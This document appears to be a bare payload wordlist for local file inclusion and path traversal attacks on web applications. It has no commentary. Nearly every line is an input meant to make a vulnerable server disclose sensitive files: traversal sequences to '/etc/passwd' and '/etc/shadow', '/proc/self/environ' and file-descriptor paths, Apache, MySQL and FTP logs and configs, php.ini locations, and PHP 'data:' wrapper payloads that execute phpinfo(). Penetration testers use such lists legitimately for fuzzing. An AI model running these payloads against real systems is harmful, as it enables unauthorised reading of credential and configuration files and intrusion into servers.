/etc/httpd/php.ini
/etc/logrotate.d/ftp
../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/error.log
../../../../etc/passwd
/usr/pkgsrc/net/pureftpd/
/opt/xampp/etc/php.ini
/etc/security/environ
../../../../../var/log/httpd-access.log
../../../../../../../etc/security/passwd
/etc/group
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/WINNT\php.ini
/apache2/logs/error.log
/etc/pure-ftpd/pureftpd.pdb
/etc/php4/cgi/php.ini
/proc/self/fd/11
../../../../../../../../../../../../../../../var/log/apache/access_log
/proc/self/fd/29
/etc/vhcs2/proftpd/proftpd.conf
../etc/group
../../../../../proc/self/fd/8
../../../../../../../../../../../../../../etc/passwd
/etc/apache/conf/httpd.conf
/logs/access_log
/etc/chrootUsers
../../etc/security/passwd
/private/etc/httpd/httpd.conf.default
/etc/wu-ftpd/ftphosts
/opt/lampp/logs/error_log
../../../../../../../etc/shadow
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/etc/mysql/my.cnf
../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log
/var/log/pureftpd.log
../../../../../../../../../../../../var/log/httpd-access.log
/usr/local/apache/logs/error.log
/var/log/apache2/error_log
../../../../../logs/access_log
/usr/local/php5/lib/php.ini
../../../../../../../../../../../../../etc/group
/var/log/exim/rejectlog
/usr/local/lib/php.ini
/Program Files\Apache Group\Apache\conf\httpd.conf
../../logs/error_log
/usr/local/cpanel/logs
/proc/self/fd/0
/usr/ports/net/pure-ftpd/
../../../../../../../../../../etc/security/user
/var/log/apache2/error.log
/etc/vsftpd.conf
/proc/self/fd/31
/var/log/pure-ftpd/pure-ftpd.log
/var/cpanel/cpanel.config
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log
/proc/self/fd/10
/usr/lib/security/mkuser.default
/apache2/logs/access.log
../../../../../../../../../proc/self/fd/8
/etc/httpd/logs/error_log
../../etc/security/user
../../../../logs/error_log
../../etc/security/group
../../../../../../../../../../../../../../../var/log/apache2/access.log
../../../../proc/self/fd/8
../../../../../../../../../../../../../proc/self/fd/8
/xampp\apache\bin\php.ini
/usr/local/php4/httpd.conf.php
/usr/local/etc/pure-ftpd.conf
/etc/proftp.conf
../../../../../../../../../../../../../../../proc/self/fd/8
data:text/pain,<?php phpinfo()?>
/usr/local/etc/pureftpd.pdb
/opt/lampp/logs/error.log
/opt/xampp/logs/access_log
../../../../../../../var/log/httpd-access.log
/var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/apache/error.log
/etc/pure-ftpd/pure-ftpd.conf
../../../../../../../../../../../../../../../var/log/apache2/error_log
../etc/security/passwd
/var/local/www/conf/php.ini
/proc/self/fd/21
../../../../../../../../../../../etc/security/user
/proc/self/fd/22
../../../proc/self/fd/8
/php4\php.ini
/var/log/ftp-proxy/ftp-proxy.log
../../var/log/httpd-access.log
../../../../etc/security/group
/usr/apache2/conf/httpd.conf
/var/log/exim_mainlog
/proc/self/fd/1
../../../../../../logs/error_log
../../../../../../../../../etc/security/passwd
../../../../../../../../etc/group
../../../../../../../etc/security/user
/var/log/ftp-proxy
/usr/sbin/pure-config.pl
/etc/passwd
../../../../../../../../../../etc/security/group
/opt/apache/conf/httpd.conf
/Program Files\xampp\apache\conf\httpd.conf
../../proc/self/fd/8
/var/log/httpd/access_log
/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/etc/apache2/conf/httpd.conf
../logs/access_log
../../../../../../../../../../../var/log/httpd-access.log
/proc/self/fd/15
/usr/local/php4/lib/php.ini
/etc/proftpd/modules.conf
/web/conf/php.ini
../../../etc/passwd
../../../../../../../../../../../../../../etc/shadow
/proc/self/fd/18
../../../../../../../../../etc/security/group
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log
/var/log/xferlog
/proc/self/cmdline
/Program Files\Apache Group\Apache\logs\error.log
../../../../../../../../../../../../../proc/self/environ
../../../../../../etc/security/passwd
/proc/self/fd/5
../../../../../../etc/security/group
/NetServer\bin\stable\apache\php.ini
/usr/local/apache2/logs/access.log
/etc/php.ini
../../../../../../../../../../../../../../../var/log/apache/error_log
/var/log/httpd/access.log
../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/environ
/proc/self/fd/26
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/security/group
/Volumes/webBackup/private/etc/httpd/httpd.conf
/opt/xampp/logs/access.log
/etc/php5/cgi/php.ini
../../../logs/access_log
/var/log/exim/mainlog
/var/log/mysql/mysql.log
/usr/ports/contrib/pure-ftpd/
/proc/self/fd/35
../../../../../../../../../../etc/security/passwd
/usr/local/php5/httpd.conf.php
../../../../../../../../../../proc/self/environ
/apache\php\php.ini
../../../../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../../../../var/log/httpd/access_log
/usr/local/apps/apache/conf/httpd.conf
/proc/self/status
/etc/vsftpd/vsftpd.conf
/opt/xampp/logs/error.log
../../../../../../logs/access_log
/usr/local/apache/conf/httpd.conf
../../../../../../../../../../etc/group
/usr/local/etc/php.ini
/proc/self/environ
/opt/lampp/logs/access.log
../../../../../../../../../../../../etc/group
/var/lib/mysql/my.cnf
/var/log/mysql/mysql-slow.log
/etc/my.cnf
/apache/logs/access.log
../../../../logs/access_log
../../../../../../../../../../../../../../../var/log/apache2/error.log
/proc/self/fd/14
/usr/local/php/httpd.conf.php
../../../../../../../../../../../etc/passwd
/var/log/httpd/error.log
../../../../../../../../../../../proc/self/fd/8
/proc/self/fd/23
/etc/apache2/httpd.conf
/proc/self/fd/28
/WINDOWS\php.ini
/usr/local/cpanel/logs/login_log
/proc/self/fd/17
../../../../../../../../../../../../../../../apache2/logs/error.log
../../../../../../../../../../../../etc/passwd
/etc/php/cgi/php.ini
../../../../../etc/security/group
../../../../../../../../../../../../../../../apache/logs/error.log
/apache/logs/error.log
/usr/local/pureftpd/sbin/pure-config.pl
../../../../etc/group
../../../../../etc/security/passwd
../../../etc/security/user
../../../../proc/self/environ
../../../../../../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../../../../../../opt/xampp/logs/error_log
../../../../../../../../etc/shadow
/etc/httpd/logs/error.log
/var/www/logs/access_log
/etc/security/user
/etc/security/group
../../../../../proc/self/environ
/logs/access.log
/usr/local/apache/logs/error_log
../../../../../../../proc/self/fd/8
/var/www/logs/error_log
/var/log/access_log
../../../../../../../../etc/passwd
/etc/httpd/httpd.conf
../../../../../../../../../../../../../etc/security/user
/etc/httpd/logs/acces.log
../../../../../etc/shadow
/etc/php/php.ini
/var/log/mysql/mysql-bin.log
../../../../apache/logs/access.log
../../../../../../../../../../../etc/group
../../../../../../../logs/error_log
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../../../../../../../var/log/httpd/access.log
../../etc/group
/var/adm/log/xferlog
/opt/lampp/logs/access_log
/var/log/proftpd
/var/log/exim_paniclog
../../../../../logs/error_log
/usr/local/etc/httpd/conf/httpd.conf
../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../var/log/httpd-access.log
/var/log/mysqlderror.log
/proc/self/fd/13
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log
../etc/shadow
../etc/passwd
/etc/httpd/logs/acces_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log
/var/www/logs/access.log
../../../../../../../../../../../../../../../var/log/httpd/error.log
../../../../etc/security/user
../../../../../../../../../../../../../../../var/log/error_log
../../../../../../../../proc/self/fd/8
../../../../../../etc/shadow
../../../../../../proc/self/fd/8
/usr/local/apache/conf/php.ini
/etc/security/passwd
../../../../../../../etc/group
../../../../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../../../../../../../../../proc/self/environ
/proc/self/fd/2
../../../../../../../proc/self/environ
../../../../../../../../../../../../../../etc/group
/usr/lib/php.ini
../../../apache/logs/access.log
../../../../../../../../proc/self/environ
/usr/local/apache2/logs/error_log
../../../../../../../../etc/security/group
/var/mysql.log
/usr/local/apache2/logs/access_log
../../../../../../../../../../../../../../../var/www/logs/error.log
/usr/local/apache2/httpd.conf
/usr/local/apache/logs/access_log
/etc/php5/apache/php.ini
../../../../../../../../../../../../../../../../etc/passwd
/etc/httpd/logs/access_log
/var/log/maillog
/etc/shadow
/usr/local/pureftpd/etc/pureftpd.pdb
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../../../../../../../proc/self/fd/8
/usr/local/php5/httpd.conf
/etc/wu-ftpd/ftpaccess
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/etc/protpd/proftpd.conf
/var/log/apache2/access_log
/etc/php4.4/fcgi/php.ini
../../../../../../../../../../../../../../../var/log/access.log
/var/log/error_log
../proc/self/fd/8
/home\bin\stable\apache\php.ini
/Volumes/webBackup/opt/apache2/conf/httpd.conf
../../../../../../../../../../../../../../../opt/xampp/logs/access.log
/etc/php4/apache/php.ini
/etc/pure-ftpd/pure-ftpd.pdb
/proc/self/fd/25
/usr/local/apache/httpd.conf
/opt/apache2/conf/httpd.conf
../../logs/access_log
../../../../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../../../../../../proc/self/fd/8
/proc/self/fd/30
../../../../../../../../../etc/passwd
/etc/php/php4/php.ini
-/etc/pure-ftpd.conf
../etc/security/group
/etc/httpd/conf/httpd.conf
../../../../../../etc/security/user
../../../../../../../../../../../../proc/self/environ
/var/log/ftplog
../../../../../../../../../../../../etc/security/user
../../../../../../../../../../../../../../../opt/xampp/logs/access_log
../../../../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../var/log/httpd-access.log
/usr/local/pureftpd/etc/pure-ftpd.conf
/logs/error.log
/etc/vsftpd.chroot_list
/proc/self/stat
/proc/self/fd/8
../../../../../../../etc/passwd
/usr/local/etc/apache/vhosts.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/etc/php/apache/php.ini
../../../../../../../logs/access_log
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/private/etc/httpd/httpd.conf
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../etc/shadow
../../proc/self/environ
../../../proc/self/environ
../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../etc/shadow
/usr/local/apache2/conf/httpd.conf
../../../../var/log/httpd-access.log
/logs/error_log
/var/log/apache2/access.log
../../../etc/shadow
/Program Files\Apache Group\Apache\logs\access.log
../../../../../../../../../../../../../../proc/self/environ
/Program Files\Apache Group\Apache2\conf\httpd.conf
../../../../../../../../etc/security/passwd
../../etc/shadow
../../../../../../../../../../../../../../../opt/lampp/logs/access_log
/etc/php5/apache2/php.ini
../../etc/passwd
../../../etc/group
../../../../../../../../../../var/log/httpd-access.log
../logs/error_log
/opt/xampp/logs/error_log
../../../../../../../../../../../../../../../apache2/logs/access.log
/usr/local/etc/apache/conf/httpd.conf
../etc/security/user
../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log
/etc/httpd.conf
/proc/self/fd/32
/home2\bin\stable\apache\php.ini
/usr/local/cpanel/logs/error_log
/var/log/exim/paniclog
/php\php.ini
../../../../../../../../etc/security/user
/var/www/conf/httpd.conf
data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=../../../../../../../../../../../../../etc/security/passwd
/www/logs/proftpd.system.log
/usr/local/etc/apache2/conf/httpd.conf
/etc/logrotate.d/proftpd
../../../../../../../../../../etc/shadow
../proc/self/environ
/etc/wu-ftpd/ftpusers
../../../../../etc/security/user
/usr/lib/php/php.ini
../../../../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../../../../etc/passwd
/usr/local/apache2/logs/error.log
../../../../../../../../../../../etc/security/group
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/var/www/logs/error.log
../../../../../../../../../../../../../../../var/log/access_log
/var/log/vsftpd.log
/etc/security/limits
/proc/self/fd/24
/proc/self/fd/34
/usr/ports/ftp/pure-ftpd/
/proc/self/fd/4
/usr/local/cpanel/logs/access_log
/proc/self/fd/3
/usr/local/httpd/conf/httpd.conf
../../../../../../../../../etc/group
../../../../../../../../../../../../../../../opt/xampp/logs/error.log
/usr/local/Zend/etc/php.ini
../../../../etc/security/passwd
../../../../../../var/log/httpd-access.log
/var/log/apache/error_log
../../../../../etc/passwd
../../../../../../../../../../../../../../etc/security/passwd
/usr/local/cpanel/logs/stats_log
/php5\php.ini
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/php/httpd.conf
/usr/local/cpanel/logs/license_log
/var/log/httpd/error_log
/etc/pureftpd.passwd
../../../../../etc/group
/proc/self/fd/33
/etc/php/apache2/php.ini
/proc/self/fd/7
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../var/log/httpd-access.log
/var/log/apache/access_log
../../../../../../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log
/PHP\php.ini
/proc/self/fd/9
../../../../../../../../../../../etc/shadow
../../../etc/security/group
/proc/self/fd/6
/usr/local/php4/httpd.conf
/var/log/error.log
/proc/self/fd/20
/usr/etc/pure-ftpd.conf
/etc/ftpchroot
/etc/http/conf/httpd.conf
../../../../../../../../../../proc/self/fd/8
/bin/php.ini
/proc/self/fd/16
/etc/ftphosts
/proc/self/fd/12
/etc/logrotate.d/vsftpd.log
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default
../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../../../proc/self/fd/8
/var/log/mysql.log
/proc/self/fd/19
../../../../../../proc/self/environ
/var/log/access.log
proc/self/environ
../../../var/log/httpd-access.log
../var/log/httpd-access.log
/var/log/exim_rejectlog
../../apache/logs/access.log
../../../../../../etc/group
/logs/pure-ftpd.log
../../../../etc/shadow
../../../../../../../../../etc/security/user
/etc/http/httpd.conf
../../../../../../../../../../../proc/self/environ
/proc/self/fd/27
../../../../../../etc/passwd
../../../../../../../../../../../../../../../proc/self/environ
/usr/local/apache/logs/access.log
/etc/php4/apache2/php.ini
../../../../../../../../../../../../../etc/shadow
../../../etc/security/passwd
../../../../../../../../../../../../../../var/log/httpd-access.log
/etc/pureftpd.pdb
/var/log/apache/error.log
/var/log/apache/access.log
/usr/apache/conf/httpd.conf
../../../../../../../../../var/log/httpd-access.log
